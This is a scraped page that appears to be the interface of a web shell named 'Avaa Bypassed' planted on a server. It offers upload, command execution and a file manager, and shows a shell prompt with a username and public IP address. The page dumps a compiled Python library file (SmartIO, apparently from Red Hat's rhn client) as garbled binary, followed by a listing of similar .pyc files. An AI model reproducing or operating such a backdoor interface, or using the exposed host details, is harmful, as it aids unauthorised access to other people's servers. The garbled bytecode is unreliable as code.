404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@3.145.157.93: ~ $
3

U��Zt�@sXdZddlZyddlmZWn ek
r<ddlmZYnXGdd�d�Zdd�ZdS)	z*
This module implements the SmartIO class
�N)�StringIO)�BytesIOc@s:eZdZdZddd�Zdd�Zdd	�Zd
d�Zdd
�ZdS)�SmartIOa�
    The SmartIO class allows one to put a cap on the memory consumption.
    StringIO objects are very fast, because they are stored in memory, but
    if they are too big the memory footprint becomes noticeable.
    The write method of a SmartIO determines if the data that is to be added
    to the (initially) StrintIO object does not exceed a certain threshold; if
    it does, it switches the storage to a temporary disk file
    �@rcCs$||_t�|_|rd|_nd|_dS)N�r)�
_max_mem_sizer�_io�_fixed)�self�max_mem_sizeZ	force_mem�r�/usr/lib/python3.6/SmartIO.py�__init__s
zSmartIO.__init__cCs
||_dS)N)r)r
rrrr
�set_max_mem_size'szSmartIO.set_max_mem_sizecCs|jS)N)r)r
rrr
�get_max_mem_size*szSmartIO.get_max_mem_sizecCsP|js@t|�|jj�|jkr@t�}|j|jj��d|_||_|jj|�dS)Nr)r	�lenr�tellr�	_tempfile�write�getvalue)r
�dataZtmpfilerrr
r-sz
SmartIO.writecCst|j|�S)N)�getattrr)r
�namerrr
�__getattr__9szSmartIO.__getattr__N)rr)	�__name__�
__module__�__qualname__�__doc__rrrrrrrrr
rs
rcCs6ddl}|jdtj�d�\}}tj|�tj|d�S)Nrz_rhn_transports-%d-)�prefixzwb+)�tempfileZmkstemp�os�getpid�unlink�fdopen)r�fdZfnamerrr
r=s

r)	rr Z	cStringIOr�ImportError�iorrrrrrr
�<module>
s+

Filemanager

Name Type Size Permission Actions
SSL.cpython-36.opt-1.pyc File 7.08 KB 0644
SSL.cpython-36.pyc File 7.08 KB 0644
SmartIO.cpython-36.opt-1.pyc File 2.04 KB 0644
SmartIO.cpython-36.pyc File 2.04 KB 0644
UserDictCase.cpython-36.opt-1.pyc File 3.04 KB 0644
UserDictCase.cpython-36.pyc File 3.04 KB 0644
__init__.cpython-36.opt-1.pyc File 188 B 0644
__init__.cpython-36.pyc File 188 B 0644
connections.cpython-36.opt-1.pyc File 7.21 KB 0644
connections.cpython-36.pyc File 7.26 KB 0644
i18n.cpython-36.opt-1.pyc File 876 B 0644
i18n.cpython-36.pyc File 876 B 0644
nonblocking.cpython-36.opt-1.pyc File 2.09 KB 0644
nonblocking.cpython-36.pyc File 2.09 KB 0644
rhnLockfile.cpython-36.opt-1.pyc File 2.63 KB 0644
rhnLockfile.cpython-36.pyc File 2.63 KB 0644
rpclib.cpython-36.opt-1.pyc File 17.8 KB 0644
rpclib.cpython-36.pyc File 17.89 KB 0644
tb.cpython-36.opt-1.pyc File 416 B 0644
tb.cpython-36.pyc File 416 B 0644
transports.cpython-36.opt-1.pyc File 18.67 KB 0644
transports.cpython-36.pyc File 18.67 KB 0644